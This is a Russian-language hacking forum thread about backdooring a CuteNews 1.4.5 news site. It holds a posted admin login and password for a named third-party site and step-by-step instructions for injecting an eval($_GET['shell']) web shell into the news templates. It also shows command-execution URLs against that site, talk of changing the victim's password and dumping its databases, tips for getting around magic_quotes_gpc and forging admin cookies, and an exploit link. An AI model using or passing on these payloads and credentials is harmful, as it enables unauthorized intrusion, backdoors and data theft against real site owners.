Shell CuteNews 1.4.5 Help!
 

Всем привет!
Вобщем возник вопрос как залить шелл в известный блог новостей (CuteNews) имея данные администратора.
Прочитал много мануалов и эфект нулейвой может ктонить сможет если сможете можете описать как сделали это буду очень признателен :)
Вот куда я хочу залить шелл.
_ttp://la2.no-ip.org/news/
Login: dsl
Password: 79513159

Заранее спасибо.

Оо у мня такаяже прабла немогу понять что нетак делаю. подскажите плиз.

скока писали уже про это...

1. Настройкa блока новостей -> Редактировать шаблоны
Добавляем в конец
сохраняем
2.
_http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
_http://la2.no-ip.org/news/show_news.php?shell=system(dir);

p.s: там Windows...

Дело в том что я делаю так.
Настройкa блока новостей ->>> Редактировать шаблоны И вижу там


Редактируйте Части Шаблона

Активные новости
Полная версия
Комментарии
Форма добавления комментариев
Предыдущая & Следующая(новости)
Предыдущая & Следующая(коментарий)

Жму Активные новости

Там открывается окошко с следущим содержанием

Я дописываю Получается так

Потом захожу из этих сылоку куданить

Мне выдаёт ошибку мол

Что делать ваще незнаю :(

Сайт работает и я чуствую что он даже меня переживёт (((

ППЦ уже кто-то залез в админку и щас даже шаблон не отредактировать (((

А ты смельчак выкладывать логин и пароль в открытый доступ..

Это не мой :)))

http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
http://la2.no-ip.org/news/show_news.php?shell=system(dir);

все работает, пароль от админки я сменил, и т.к ты уже стучишся в аську ), я его тебе туда отправил...

М возник еще вопрос.
Дело в том что мне надо слить их базы.
Даныые базы хронятся тут Как организовать это скажите плиз.

Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему

Мда спасибо за оригинальный ответ а поточней чёнить сказать можеш ?

подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап

:D
Это все знают, ток проблемы от базы пасы узнать ;) :)

а конфиг сложно посмотреть ? =\

Блин, люди, а давайте подытожим...???
Короче с помощью сплойтов узнаем логин админа и МД5 хеш...если все зер гуд, то есть шанс двигать дальше...так???
Дальше...подменяем куки при помощи Оперы или Мозилы, или и т.д.
Заходим в админку CuteNews...при удачном раскладе вставляем в активные шаблоны код навроде :

HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);
дальше... сохраняем
ИСПОЛЬЗУЕМ:
_http://site/news/show_news.php?shell=phpinfo();
_http://site/news/show_news.php?shell=system(dir);

ПХПИНФО это конечно хорошо)...а как использовать system()???
dir выводит...а вот system(dir c:\); уже фиг(((
варианты: system(dir+c:\) system("dir c:\") system('dir c:\') system('dir', 'c:\') тоже не дают результата....где-то не догоняю чего-то?

P.S. Например хочу прочитать файл config.php, тогда команда для винды будет type config.php...либо cmd /c type config.php... вобщем любые варианты со скобками и кавычками результата не дают положительного...
Выдает ошибку примерно такую(это если кавычки использовать):

Вобщем поискав в инете, вроде бы выходит, что все дело в том, что на серве включено magic_quotes_gpc...Обойти это как-то можно?

Блин, ну кто-нибудь...подскажите, как обойти вставку \ ...из-за magic_quotes_gpc=ON вместо подозрительных символов (пробел,",' и т.д.) подставляется \.Что-нибудь можно сделать вообще?
Серв в локальной сети.Я его вижу, а у него в мою зону доступа нет и в ИНЕТ нет доступа, так что XSS не катит(.ПЛИЗ..ПОКА НЕ ПРИКРЫЛИ...

Спасибо, что откликнулись))))
Я сам уже догадался...)
Реально удовольствие от собственных побед НАМНОГО БОЛЬШЕ!!!)

Ну ппц :) Я ж писал уже...
Дописываем в конце Active News:
Заходим на http://уязвимый_сервер.ru/sk.php - и лазим по чужому компу...
У кого не получиться пм...

:) Я ж писал, что нет возможности выполнить XSS)))....Но все зер ГУД)...Через Чары проблему решил)

Народ не подскажете как пасс достать админа в кут нюс, эксплоит или че нить, ссылочку =)

http://www.milw0rm.com/exploits/4779